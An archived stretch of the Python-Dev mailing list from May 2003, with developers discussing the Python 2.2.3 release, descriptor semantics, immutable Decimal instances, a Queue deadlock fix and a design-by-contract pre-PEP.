I'm currently in Ottawa at the GCC summit trying to sponge some knowledge
but I will begin following your advice when I get back home later this
week.

Thanks again !

Jeff

> I know I learned a lot from working on patches and bugs.  It especially
> helps if you jump in on a patch that is being actively worked on and can
> ask how something works.  Otherwise just read the source until your eyes
>   bleed and curse anyone who doesn't write extensive documentation for
> code.  =)
>
> There also has been mention of the AST branch.  I know I plan on working
> on that after I finish going through the bug and patch backlog.  Only
> trouble is that the guys who actually fully understand it (Jeremy, Tim,
> and Neal) are rather busy so it is going to be a "jump in the pool and
> drown and hope your flailing manages to at least generate something
> useful but you die and come back in another life wiser and able to
> attempt again until you stop drowning and manage to only get sick from
> gulping down so much chlorinated water".  =)
>
>  >  Check out
>  >
>  >     http://www.python.org/dev/
>  >
>  > for orientation, and leave your spare time at the door <wink>.
>  >
>
> I will vouch for the loss of spare time.  This has become a job.  Best
> job ever, though.  =)
>
> The only big piece of advice I can offer is to just make sure you are
> nice and cordial on the list; there is a low tolerance for jerks here.
> Don't take this as meaning to not take a stand on an issue!  All I am
> saying is realize that email  does not transcribe humor perfectly and
> until the list gets used to your personal writing style you  might have
> to just make sure  what you write does not come off as insulting.
>
> -Brett
>
>
>
> --__--__--
>
> Message: 9
> Date: Thu, 22 May 2003 20:21:20 -0700
> From: "Brett C." <bac@OCF.Berkeley.EDU>
> Reply-To: drifty@alum.berkeley.edu
> To: Jeffery Roberts <g9robjef@cdf.toronto.edu>
> CC: Tim Peters <tim.one@comcast.net>, python-dev@python.org
> Subject: Re: [Python-Dev] Introduction
>
> Jeffery Roberts wrote:
> > Thanks for all of your replies.  The front-end rewrite sounds especially
> > interesting. I'm going to look into that.  Is the entire front end
> > changing (ie scan/parse/ast) or just the AST structure ?
> >
> > If you have any more information or directions please let me know.
> >
>
> It is just a new AST.  Redoing/replacing pgen is something else
> entirely.  =)
>
> The branch that this is being developed under in CVS is ast-branch.
> There is an incomplete README in Python/compile.txt that explains the
> basic idea and direction.
>
> -Brett
>
>
>
> --__--__--
>
> Message: 10
> Date: Thu, 22 May 2003 23:30:45 -0400
> Cc: python-list@python.org, python-dev@python.org
> To: python-announce@python.org
> From: Barry Warsaw <barry@python.org>
> Subject: [Python-Dev] RELEASED Python 2.2.3c1
>
> I'm happy to announce the release of Python 2.2.3c1 (release candidate
> 1).  This is a bug fix release for the stable Python 2.2 code line.
> Barring any critical issues, we expect to release Python 2.2.3 final by
> this time next week.  We encourage those with an interest in a solid
> 2.2.3 release to download this candidate and test it on their code.
>
> The new release is available here:
>
>     http://www.python.org/2.2.3/
>
> Python 2.2.3 has a large number of bug fixes and memory leak patches.
> For full details, see the release notes at
>
>     http://www.python.org/2.2.3/NEWS.txt
>
> There are a small number of minor incompatibilities with Python 2.2.2;
> for details see:
>
>     http://www.python.org/2.2.3/bugs.html
>
> Perhaps the most important is that the Bastion.py and rexec.py modules
> have been disabled, since we do not deem them to be safe.
>
> As usual, a Windows installer and a Unix/Linux source tarball are made
> available, as well as tarballs of the documentation in various forms.
> At the moment, no Mac version or Linux RPMs are available, although I
> expect them to appear soon after 2.2.3 final is released.
>
> On behalf of Guido, I'd like to thank everyone who contributed to this
> release, and who continue to ensure Python's success.
>
> Enjoy,
> -Barry
>
>
>
> --__--__--
>
> Message: 11
> Date: Fri, 23 May 2003 13:42:20 +0200
> Subject: Re: [Python-Dev] RELEASED Python 2.2.3c1
> Cc: python-dev@python.org
> To: Barry Warsaw <barry@python.org>
> From: Jack Jansen <Jack.Jansen@cwi.nl>
>
>
> On Friday, May 23, 2003, at 05:30 Europe/Amsterdam, Barry Warsaw wrote:
>
> > I'm happy to announce the release of Python 2.2.3c1 (release candidate
> > 1).
>
> Oops, that suddenly went *very* fast, I thought I had until the
> weekend...
>
> Is there a chance I could get #723495 still in before 2.2.3 final? I
> was also hoping to find a fix for #571343, but I don't have a patch yet
> (although I'll try to get one up in the next few hours).
> --
> Jack Jansen, <Jack.Jansen@cwi.nl>, http://www.cwi.nl/~jack
> If I can't dance I don't want to be part of your revolution -- Emma
> Goldman
>
>
>
> --__--__--
>
> Message: 12
> Date: Fri, 23 May 2003 09:11:35 -0400
> From: Guido van Rossum <guido@python.org>
> Subject: Re: [Python-Dev] Of what use is commands.getstatus()
> To: skip@pobox.com
> Cc: python-dev@python.org
>
> > I was reading the docs for the commands module and noticed getstatus() seems
> > to be completely unrelated to getstatusoutput() and getoutput().  I thought,
> > "I'll correct the docs.  They must be wrong."  Then I looked at commands.py
> > and saw the docs are correct.  It's the function definition which is weird.
> > Of what use is it to return 'ls -ld file'?  Based on its name I would have
> > guessed its function was
> >
> >     def getstatus(cmd):
> >         """Return status of executing cmd in a shell."""
> >         return getstatusoutput(cmd)[0]
> >
> > This particular function dates from 1990, so it clearly can't just be
> > deleted, but it seems completely superfluous to me, especially given the
> > existence of os.stat, os.listdir, etc.  Should it be deprecated or modified
> > to do (what I think is) the obvious thing?
>
> That whole module wasn't thought out very well.  I recently tried to
> use it and found that the strip of the trailing \n on getoutput() is
> also a counterproductive feature.  I suggest that someone should
> design a replacement, perhaps to live in shutil, and then we can
> deprecate it.  Until then I would leave it alone.  Certainly don't
> "fix" it by doing something incompatible.
>
> --Guido van Rossum (home page: http://www.python.org/~guido/)
>
>
>
> --__--__--
>
> Message: 13
> Date: Fri, 23 May 2003 10:06:05 -0400
> From: Guido van Rossum <guido@python.org>
> Subject: Re: [Python-Dev] Descriptor API
> To: Gonçalo Rodrigues <op73418@mail.telepac.pt>
> Cc: python-dev@python.org
>
> > I was doing some tricks with metaclasses and descriptors in Python 2.2 and
> > stumbled on the following:
> >
> > >>> class test(object):
> > ...     a = property(lambda: 1)
> > ...
> > >>> print test.a
> > <property object at 0x01504D20>
> > >>> print test.a.__set__
> > <method-wrapper object at 0x01517220>
> > >>> print test.a.fset
> > None
> >
> > What this means in practice, is that if I want to test if a
> > descriptor is read-only I have to have two tests: One for custom
> > descriptors, checking that getting __set__ does not barf and another
> > for property, checking that fset returns None.
>
> Why are you interested in knowing whether a descriptor is read-only?
>
> > So, why doesn't getting __set__  raise AttributeError in the above case?
>
> This is a feature.  The presence of __set__ (even if it always raises
> AttributeError when *called*) signals this as a "data descriptor".
> The difference between data descriptors and others is that a data
> descriptor can not be overridden by putting something in the instance
> dict; a non-data descriptor can be overridden by assignment to an
> instance attribute, which will store a value in the instance dict.
>
> For example, a method is a non-data descriptor (and the prevailing
> example of such).  This means that the following example works:
>
>   class C(object):
>       def meth(self): return 42
>
>   x = C()
>   x.meth()  # prints 42
>   x.meth = lambda: 24
>   x.meth()  # prints 24
>
> > Is this a bug? If it's not, it sure is a (minor) feature request
> > from my part :-)
>
> Because of the above explanation, the request cannot be granted.
>
> You can test the property's fset attribute however to tell whether a
> 'set' argument was passed to the constructor.
>
> --Guido van Rossum (home page: http://www.python.org/~guido/)
>
>
> --__--__--
>
> Message: 14
> From: Gonçalo Rodrigues <op73418@mail.telepac.pt>
> To: <python-dev@python.org>
> Subject: Re: [Python-Dev] Descriptor API
> Date: Fri, 23 May 2003 15:34:14 +0100
>
>
> ----- Original Message -----
> From: "Guido van Rossum" <guido@python.org>
> To: "Gon=E7alo Rodrigues" <op73418@mail.telepac.pt>
> Cc: <python-dev@python.org>
> Sent: Friday, May 23, 2003 3:06 PM
> Subject: Re: [Python-Dev] Descriptor API
>
>
> > > I was doing some tricks with metaclasses and descriptors in Python 2.2 and
> > > stumbled on the following:
> > >
> > > >>> class test(object):
> > > ...     a = property(lambda: 1)
> > > ...
> > > >>> print test.a
> > > <property object at 0x01504D20>
> > > >>> print test.a.__set__
> > > <method-wrapper object at 0x01517220>
> > > >>> print test.a.fset
> > > None
> > >
> > > What this means in practice, is that if I want to test if a
> > > descriptor is read-only I have to have two tests: One for custom
> > > descriptors, checking that getting __set__ does not barf and another
> > > for property, checking that fset returns None.
> >
> > Why are you interested in knowing whether a descriptor is read-only?
> >
>
> Introspection dealing with a metaclass that injected methods in its
> instances depending on a descriptor. In other words, having fun with
> Python's wacky tricks.
>
> > > So, why doesn't getting __set__  raise AttributeError in the above case?
> >
> > This is a feature.  The presence of __set__ (even if it always raises
> > AttributeError when *called*) signals this as a "data descriptor".
> > The difference between data descriptors and others is that a data
> > descriptor can not be overridden by putting something in the instance
> > dict; a non-data descriptor can be overridden by assignment to an
> > instance attribute, which will store a value in the instance dict.
> >
> > For example, a method is a non-data descriptor (and the prevailing
> > example of such).  This means that the following example works:
> >
> >   class C(object):
> >       def meth(self): return 42
> >
> >   x = C()
> >   x.meth()  # prints 42
> >   x.meth = lambda: 24
> >   x.meth()  # prints 24
> >
> > > Is this a bug? If it's not, it sure is a (minor) feature request
> > > from my part :-)
> >
> > Because of the above explanation, the request cannot be granted.
> >
>
> Thanks for the reply (and also to P. Eby, btw). I was way off track when I
> sent the email, because it did not occur to me that property was a type
> implementing __get__ and __set__. With this piece of info connecting the
> dots the idea is just plain foolish.
>
> > You can test the property's fset attribute however to tell whether a
> > 'set' argument was passed to the constructor.
> >
> > --Guido van Rossum (home page: http://www.python.org/~guido/)
>
> With my best regards,
> G. Rodrigues
>
>
>
> --__--__--
>
> Message: 15
> Date: Fri, 23 May 2003 10:39:10 -0400
> From: Guido van Rossum <guido@python.org>
> Subject: Re: [Python-Dev] Need advice, maybe support
> To: Christian Tismer <tismer@tismer.com>
> Cc: python-dev@python.org
>
> > > The other is the new style where the PyMethodDef
> > > array is in tp_methods, and is scanned once by PyType_Ready.
> >
> > Right, again. Now, under the hopeful assumption that every
> > sensible extension module that has some types to publish also
> > does this through its module dictionary, I would have the
> > opportunity to cause PyType_Ready being called early enough
> > to modify the method table, before any of its methods is used
> > at all.
>
> Dangerous assumption!  It's not inconceivable that a class would
> instantiate some of its own classes as part of its module
> initialization.
>
> > > 3rd party modules that have been around for a while are likely to use
> > > Py_FindMethod.  With Py_FindMethod you don't have a convenient way to
> > > store the pointer to the converted table, so it may be better to
> > > simply check your bit in the first array element and then cast to a
> > > PyMethodDef or a PyMethodDefEx array based on what the bit says (you
> > > can safely assume that all elements of an array are the same size :-).
> >
> > Hee hee, yeah. Of course, if there isn't a reliable way to
> > intercept method table access before the first Py_FindMethod
> > call, I could of course modify Py_FindMethod. For instance,
> > a modified, new-style method table might be required to always
> > start with a dummy entry, where the flags word is completely
> > -1, to signal having been converted to new-style.
>
> Why so drastic?  You could just set a reserved bit.
>
> > ...
> >
> > >>If that approach is trustworthy, I also could drop
> > >>the request for these 8 bits.
> > >
> > > Sure.  Ah, a bit in the type would work just as well, and
> > > Py_FindMethod *does* have access to the type.
> >
> > You think of the definition in methodobject.c, as it is
> >
> > """
> > /* Find a method in a single method list */
> >
> > PyObject *
> > Py_FindMethod(PyMethodDef *methods, PyObject *self, char *name)
> > """
> >
> > , assuming that self always is not NULL, but representing a valid
> > object with a type, and this type is already referring to the
> > methods table?
>
> Right.  There is already code that uses self->ob_type in
> Py_FindMethodInChain(), which is called by Py_FindMethod().
>
> > Except for module objects, this seems to be right. I've run
> > Python against a lot of Python modules, but none seems
> > to call Py_FindMethod with a self parameter of NULL.
>
> I don't think it would be safe to do so.
>
> > If that is true, then I can patch a small couple of
> > C functions to check for the new bit, and if it's not
> > there, re-create the method table in place.
> > This is music to me ears. But...
> >
> > Well, there is a drawback:
> > I *do* need two bits, and I hope you will allow me to add this
> > second bit, as well.
> >
> > The one, first bit, tells me if the source has been compiled
> > with Stackless and its extension stuff. Nullo problemo.
> > I can then in-place modify the method table in a compatible
> way, or leave it as it is, by default.
> > But then, this isn't sufficient to set this bit then, like an
> > "everything is fine, now" relief. This is so, since this is *still*
> > an old module, and while its type's method tables have been
> > patched, the type is still not augmented by new slots, like
> > the new tp_call_nr slots (and maybe a bazillion to come, soon).
> > The drawback is, that I cannot simply replace the whole type
> > object, since type objects are not represented as object
> > pointers (like they are now, most of the time, in the dynamic
> > heaptype case), but they are constant struct addresses, where
> > the old C module might be referring to.
> >
> > So, what I think to need is no longer 9 bits, but two of them:
> > One that says "everything great from the beginning", and another
> > one that says "well, ok so far, but this is still an old object".
> >
> > I do think this is the complete story, now.
> > Instead of requiring nine bits, I'm asking for two.
> But this is just *your* options; I also can live with one bit,
> > but then I have to add a special, invalid method table entry
> > that just serves for this purpose.
> > In order to keep my souce code hack to the minimum, I'd really
> > like to ask for the two bits in the typeobject flags.
>
> OK, two bits you shall have.  Don't spend them all at once!
>
> > Thanks so much for being so supportive -- chris
>
> Anything to keep actual stackless support out of the core. :-)
>
> --Guido van Rossum (home page: http://www.python.org/~guido/)
>
>
>
> --__--__--
>
> _______________________________________________
> Python-Dev mailing list
> Python-Dev@python.org
> http://mail.python.org/mailman/listinfo/python-dev
>
>
> End of Python-Dev Digest
>


From jacobs@penguin.theopalgroup.com  Mon May 26 18:22:08 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Mon, 26 May 2003 13:22:08 -0400 (EDT)
Subject: [Python-Dev] RE: Decimal class
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEEIELAB.tim_one@email.msn.com>
Message-ID: <Pine.LNX.4.44.0305261317360.15385-100000@penguin.theopalgroup.com>

On Mon, 26 May 2003, Tim Peters wrote:
> [Kevin Jacobs]
> > Anyhow, the next big thing I want to do is to make Decimal instances
> > immutable like other Python numeric types, so they can be used as
> > hash keys, so common values can be re-used, and some of the code can
> > be simplified.
> 
> Offhand I didn't see anything in the code that mutates any inputs, so I
> expect it's at worst close.  But this kind of discussion should be in
> public, so others can jump in too (especially Eric!).

I agree 100%.  Does anyone else have feelings for or against having mutable
Decimal instances?  In the mean time, I will prepare a patch to do this so
we can evaluate the practical effects on the code.

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com



From tim_one@email.msn.com  Mon May 26 18:36:23 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Mon, 26 May 2003 13:36:23 -0400
Subject: [Python-Dev] RE: Decimal class
In-Reply-To: <Pine.LNX.4.44.0305261317360.15385-100000@penguin.theopalgroup.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEEKELAB.tim_one@email.msn.com>

[Kevin Jacobs]
>>> Anyhow, the next big thing I want to do is to make Decimal instances
>>> immutable like other Python numeric types, so they can be used as
>>> hash keys, so common values can be re-used, and some of the code can
>>> be simplified.

[Tim]
>> Offhand I didn't see anything in the code that mutates any inputs,
>> so I expect it's at worst close.  But this kind of discussion should
>> be in public, so others can jump in too (especially Eric!).

[Kevin]
> I agree 100%.  Does anyone else have feelings for or against having
> mutable Decimal instances?  In the mean time, I will prepare a patch
> to do this so we can evaluate the practical effects on the code.

Oh yes, they have to be immutable, meaning that no public API operation
mutates a Decimal in a user-visible way.



From aahz@pythoncraft.com  Mon May 26 18:36:29 2003
From: aahz@pythoncraft.com (Aahz)
Date: Mon, 26 May 2003 13:36:29 -0400
Subject: [Python-Dev] RE: Decimal class
In-Reply-To: <Pine.LNX.4.44.0305261317360.15385-100000@penguin.theopalgroup.com>
References: <LNBBLJKPBEHFEDALKOLCCEEIELAB.tim_one@email.msn.com> <Pine.LNX.4.44.0305261317360.15385-100000@penguin.theopalgroup.com>
Message-ID: <20030526173629.GA27743@panix.com>

On Mon, May 26, 2003, Kevin Jacobs wrote:
>
> I agree 100%.  Does anyone else have feelings for or against having
> mutable Decimal instances?  In the mean time, I will prepare a patch
> to do this so we can evaluate the practical effects on the code.

I'm opposed to mutable Decimal instances because Uncle Timmy says so.  ;-)
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From greg@cosc.canterbury.ac.nz  Mon May 26 23:45:27 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 27 May 2003 10:45:27 +1200 (NZST)
Subject: [Python-Dev] RE: Decimal class
In-Reply-To: <Pine.LNX.4.44.0305261317360.15385-100000@penguin.theopalgroup.com>
Message-ID: <200305262245.h4QMjRc05319@oma.cosc.canterbury.ac.nz>

Kevin Jacobs <jacobs@penguin.theopalgroup.com>:

> Does anyone else have feelings for or against having mutable Decimal
> instances?

Having mutable decimal instances would feel *very* strange
to me, given that all other numeric types in Python are
immutable.

+1 on making them immutable.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one@comcast.net  Tue May 27 00:13:17 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 26 May 2003 19:13:17 -0400
Subject: [Python-Dev] RE: Decimal class
In-Reply-To: <200305262245.h4QMjRc05319@oma.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEFPEHAB.tim.one@comcast.net>

[Greg Ewing]
> Having mutable decimal instances would feel *very* strange
> to me, given that all other numeric types in Python are
> immutable.
>
> +1 on making them immutable.

I don't believe there's any argument in favor of making them mutable.  The
question may arise because my old FixedPoint class had mutable instances.
That was a mistake -- I wrote that class in an afternoon, and wasn't
thinking when I added the .set_precision() method.  If they're not
immutable, they can't be used as dict keys, and that's a killer-strong
argument all by itself.
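
To spell that out, here's a minimal sketch of what a mutable numeric type
does to dict keys (FakeDecimal and set_value() are hypothetical stand-ins,
not the Decimal API under discussion):

    class FakeDecimal:
        def __init__(self, value):
            self.value = value
        def set_value(self, value):   # a mutating method, like set_precision() was
            self.value = value
        def __hash__(self):
            return hash(self.value)
        def __eq__(self, other):
            return self.value == other.value

    d = FakeDecimal(1)
    prices = {d: "one"}
    d.set_value(2)   # the hash changes underneath the dict...
    prices[d]        # ...and this raises KeyError: the entry is unreachable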



From r.vanputten@hexapole.com  Tue May 27 09:28:52 2003
From: r.vanputten@hexapole.com (Rob van Putten)
Date: Tue, 27 May 2003 10:28:52 +0200
Subject: [Python-Dev] install debian package
Message-ID: <7JELK71URD0SPXU73UQ84KJC795KJNM.3ed321c4@rob_pc>

Hi there,

I am not sure if this is the right place for my comment but here it is;

I tried to install python-dev on my new Debian woody system but it
returned an error because it tried to remove the modutils package
(probably because it was incompatible)

The problem was solved after I upgraded the modutils package
(2.4.21-2)

I am no Debian package expert but it looks to me as if the modutils
package should be upgraded from the python-dev package (if this
is somehow possible of course :-)

Hope this helps to improve the debian package.

Regards,
Rob




From gh@ghaering.de  Tue May 27 09:54:27 2003
From: gh@ghaering.de (=?windows-1252?Q?Gerhard_H=E4ring?=)
Date: Tue, 27 May 2003 10:54:27 +0200
Subject: [Python-Dev] install debian package
In-Reply-To: <7JELK71URD0SPXU73UQ84KJC795KJNM.3ed321c4@rob_pc>
References: <7JELK71URD0SPXU73UQ84KJC795KJNM.3ed321c4@rob_pc>
Message-ID: <3ED327C3.7050608@ghaering.de>

Rob van Putten wrote:
> Hi there,
> 
> I am not sure if this is the right place for my comment but here it is;

It isn't the right place. This is the list for development of Python 
itself, not for the Debian package.

> I tried to install python-dev on my new Debian woody system but it
> returned an error because it tried to remove the modutils package
> (probably because it was incompatible) [...]

I'd suggest you contact either the Debian-Python mailing list 
(http://lists.debian.org/debian-python/), or the maintainer directly.
Personally I didn't have this problem on Woody, btw.

Or just report it to the Debian bugtracking system using for example 
'reportbug'.

-- Gerhard



From skip@pobox.com  Wed May 28 02:21:34 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 27 May 2003 20:21:34 -0500
Subject: [Python-Dev] Python bug 544473 - bugfix candidate - was it applied?
Message-ID: <16084.3870.666366.928341@montanaro.dyndns.org>

Several times today I had a Queue object (Python 2.2.2) wind up deadlocked
with its fsema locked but its queue full (apparently threads are waiting to
put more items in the queue than it's supposed to hold).  Looking back at
the cvs log for the Queue module I see this message

    revision 1.15
    date: 2002/04/19 00:11:31;  author: mhammond;  state: Exp;  lines: +33 -14
    Fix bug 544473 - "Queue module can deadlock".
    Use try/finally to ensure all Queue locks remain stable.
    Includes test case.  Bugfix candidate.

but no indication that was ever applied to the maint22 branch.

I'm not suggesting that this bug fix will solve my problem (it's probably a
bug in my code), but it seems that it should have been applied but wasn't.
Should it be applied at this point or is 2.2.3 too close to release?

Skip


From guido@python.org  Wed May 28 12:20:39 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 28 May 2003 07:20:39 -0400
Subject: [Python-Dev] Python bug 544473 - bugfix candidate - was it applied?
In-Reply-To: "Your message of Tue, 27 May 2003 20:21:34 CDT."
 <16084.3870.666366.928341@montanaro.dyndns.org>
References: <16084.3870.666366.928341@montanaro.dyndns.org>
Message-ID: <200305281120.h4SBKdQ11691@pcp02138704pcs.reston01.va.comcast.net>

> Several times today I had a Queue object (Python 2.2.2) wind up deadlocked
> with its fsema locked but its queue full (apparently threads are waiting to
> put more items in the queue than it's supposed to hold).  Looking back at
> the cvs log for the Queue module I see this message
> 
>     revision 1.15
>     date: 2002/04/19 00:11:31;  author: mhammond;  state: Exp;  lines: +33 -14
>     Fix bug 544473 - "Queue module can deadlock".
>     Use try/finally to ensure all Queue locks remain stable.
>     Includes test case.  Bugfix candidate.
> 
> but no indication that was ever applied to the maint22 branch.

cvs log of the release22-maint branch shows it was applied.

> I'm not suggesting that this bug fix will solve my problem (it's probably a
> bug in my code), but it seems that it should have been applied but wasn't.
> Should it be applied at this point or is 2.2.3 too close to release?

Are you using the tip of the branch is the next question?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Wed May 28 13:52:25 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 28 May 2003 07:52:25 -0500
Subject: [Python-Dev] Python bug 544473 - bugfix candidate - was it
 applied?
In-Reply-To: <200305281120.h4SBKdQ11691@pcp02138704pcs.reston01.va.comcast.net>
References: <16084.3870.666366.928341@montanaro.dyndns.org>
 <200305281120.h4SBKdQ11691@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <16084.45321.727469.548923@montanaro.dyndns.org>

    Guido> cvs log of the release22-maint branch shows it was applied.
    ...
    Guido> Are you using the tip of the branch is the next question?

I guess I misunderstood how "cvs log" worked.  Given "cvs log foo" I thought
it would list the checkin comments for all versions and all branches of foo.
I didn't think it mattered which version of the file I asked about.

Skip



From terry@wayforward.net  Wed May 28 18:32:29 2003
From: terry@wayforward.net (Terence Way)
Date: Wed, 28 May 2003 13:32:29 -0400
Subject: [Python-Dev] Introduction
Message-ID: <5B3B5FCE-9132-11D7-BD8E-00039344A0EC@wayforward.net>

I've been lurking for a bit, and now seems like a good time to
introduce myself.

* I build messaging systems for banks, earlier I was CTO of a dot-com.
* I started programming on the TRS-80 and the RCA COSMAC VIP, later
   on the Apple ][.
* I am a Java refugee (well, I might still code in Java for pay).
* I'm into formal methods.  Translation: I like *talking* about
   formal methods, but I never use them myself :-)

I read somewhere that the best way to build big Python callouses was
to write a PEP.  Here goes:
     http://www.wayforward.net/pycontract/pep-0999.html

Programming by Contract for Python... pre-conditions, post-conditions,
invariants, with all the Eiffel goodness like weakening pre-conditions
and strengthening invariants and post-conditions on inheritance, and
access to old values.  All from docstrings, like doctest.

I'm also into handling insane numbers of incoming connections on cheap
boxes: compare Jef Poskanzer's thttpd to Apache.  10000 simultaneous
HTTP connections on a $400 computer just gets me giggling.  Stackless
Python intrigues me greatly for the same reason.

I guess that's it for now...  Cheers!



From pje@telecommunity.com  Wed May 28 19:23:39 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Wed, 28 May 2003 14:23:39 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <5B3B5FCE-9132-11D7-BD8E-00039344A0EC@wayforward.net>
Message-ID: <5.1.1.6.0.20030528140810.0249d640@telecommunity.com>

At 01:32 PM 5/28/03 -0400, Terence Way wrote:

>I read somewhere that the best way to build big Python callouses was
>to write a PEP.

Guess I'll start helping you work on the callouses, then.  :)


>   Here goes:
>     http://www.wayforward.net/pycontract/pep-0999.html

Please don't number a pre-PEP;  I believe PEP 1 recommends using 'XXX' until 
a PEP number has been assigned by the PEP editors.


>Programming by Contract for Python... pre-conditions, post-conditions,
>invariants, with all the Eiffel goodness like weakening pre-conditions
>and strengthening invariants and post-conditions on inheritance, and
>access to old values.  All from docstrings, like doctest.

A number of things aren't clear from your PEP.  For example, how would 
syntax errors in assertions be handled?  How is backward compatibility with 
existing docstrings that may use 'inv:' or 'pre:' to specify conditions 
informally?

Are you proposing that this be part of Python's core syntax?  If so, then 
why do it as docstrings?  Are you proposing instead that your 
implementation be part of the standard library?  If so, then where is the 
documentation for how a developer enables the behavior?

Also, I didn't find the motivation section convincing.  Your answer to "Why 
not have several different implementations, or let programmers implement 
their own assertions?" isn't actually a justification.  If Alice uses some 
package to wrap her methods with checks, I can weaken the preconditions in 
a subclass, by simply overriding the methods.  If I can't do that, then it 
is a weakness of the DBC package Alice used, or of Alice's package, not a 
weakness of Python.



From barry@python.org  Wed May 28 19:46:13 2003
From: barry@python.org (Barry Warsaw)
Date: 28 May 2003 14:46:13 -0400
Subject: [Python-Dev] Plans for Python 2.2.3 final
Message-ID: <1054147573.10580.20.camel@barry>

I've not heard about any showstoppers for Python 2.2.3.  Just to let
everyone know, I'd like to release it Some PM, this Friday night, EDT. 
I'll need to coordinate specifics with Fred and Tim, but expect a
check-in freeze on the branch at some point Friday, with a release to
follow shortly thereafter.

-Barry




From terry@wayforward.net  Wed May 28 20:37:14 2003
From: terry@wayforward.net (Terence Way)
Date: Wed, 28 May 2003 15:37:14 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <5.1.1.6.0.20030528140810.0249d640@telecommunity.com>
Message-ID: <C88C443E-9143-11D7-BD8E-00039344A0EC@wayforward.net>

On Wednesday, May 28, 2003, at 02:23  PM, Phillip J. Eby wrote:

> Please don't number a pre-PEP;  I believe PEP 1 recommends using 'XXX' 
> until a PEP number has been assigned by the PEP editors.
>
Ack.  Oops.  I've sent it off to peps@python.org with the XXX, but posted
here with the 999.

> A number of things aren't clear from your PEP.  For example, how would 
> syntax errors in assertions be handled?  How is backward compatibility 
> with existing docstrings that may use 'inv:' or 'pre:' to specify 
> conditions informally?
Um.  No thought given to that.  My first guess is: syntax errors printed
to standard error, optionally silently ignored, no safety checks installed
either way.  Run-time errors trapped and re-raised as some kind of
ContractViolation::

     def read_stuff(input):
         """pre: input.readline"""

would be valid, and the AttributeError would be wrapped inside a
PreconditionViolationError if the ``input`` parameter isn't some
type of input stream.

> Are you proposing that this be part of Python's core syntax?  If so, 
> then why do it as docstrings?  Are you proposing instead that your 
> implementation be part of the standard library?  If so, then where is 
> the documentation for how a developer enables the behavior?
Proposing that some implementation, hopefully mine, be put in the
standard library.  I *really* don't think contracts should be part of the
core syntax: contracts belong in the documentation, and changing all the
doc tools to parse code looking for contract assertions is harder than
building one or two docstring implementations.

self.note(): where *is* the documentation on how to enable the
behavior.

> Also, I didn't find the motivation section convincing.  Your answer to 
> "Why not have several different implementations, or let programmers 
> implement their own assertions?" isn't actually a justification.  If 
> Alice uses some package to wrap her methods with checks, I can weaken 
> the preconditions in a subclass, by simply overriding the methods.  If 
> I can't do that, then it is a weakness of the DBC package Alice used, 
> or of Alice's package, not a weakness of Python.
Consider when Alice's preconditions work, but Bob's do not.  Code that
thinks it's calling Alice's code *must not* break when calling Bob's.
Weakening pre-conditions means that Alice's pre-conditions must be
tested as well: and Bob's code is run even if his pre-conditions fail.
The converse is also true: code that understands Bob's pre-conditions
must not fail even if Alice's pre-conditions fail.  This is tough to
do with asserts, or with incompatible contract packages.
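
In other words, the pre-conditions from the whole class chain get or-ed
together.  A rough sketch of the check (my own illustration, not the
PEP's implementation):

    def check_preconditions(conditions, *args, **kwargs):
        # conditions: pre-condition callables gathered from every class in
        # the chain, e.g. [bobs_pre, alices_pre]; the call is legal if any
        # one of them accepts it
        for cond in conditions:
            try:
                if cond(*args, **kwargs):
                    return
            except Exception:
                pass      # a clause that blows up simply doesn't vote
        raise AssertionError("pre-condition violated in every class")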

I haven't made that clear in the PEP or the samples, and it needs to
be clear, because it is the /only/ reason why contracts need to be in
the language/standard runtime.

Excellent points, thanks for taking an interest.



From tim@zope.com  Wed May 28 21:03:59 2003
From: tim@zope.com (Tim Peters)
Date: Wed, 28 May 2003 16:03:59 -0400
Subject: [Python-Dev] Plans for Python 2.2.3 final
In-Reply-To: <1054147573.10580.20.camel@barry>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAFEIAB.tim@zope.com>

[Barry]
> I've not heard about any showstoppers for Python 2.2.3.

Mike Fletcher submitted two weakref bugs, one in WeakValueDictionary which I
fixed in 2.3 but am waiting to hear from Fred about before backporting, the
other a segfault I think I traced to subtype_dealloc then assigned to Guido.
The segfault should be a showstopper:

    http://www.python.org/sf/742911



From tim.one@comcast.net  Wed May 28 21:08:48 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 28 May 2003 16:08:48 -0400
Subject: [Python-Dev] Plans for Python 2.2.3 final
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEAFEIAB.tim@zope.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGEIAB.tim.one@comcast.net>

[Tim]
> Mike Fletcher submitted two weakref bugs, one in WeakValueDictionary

Nope, WeakKeyDictionary.

> which I fixed in 2.3 but am waiting to hear from Fred about before
> backporting, the other a segfault I think I traced to subtype_dealloc
> then assigned to Guido. The segfault should be a showstopper:
>
>     http://www.python.org/sf/742911

No change there.


From barry@python.org  Wed May 28 21:22:00 2003
From: barry@python.org (Barry Warsaw)
Date: 28 May 2003 16:22:00 -0400
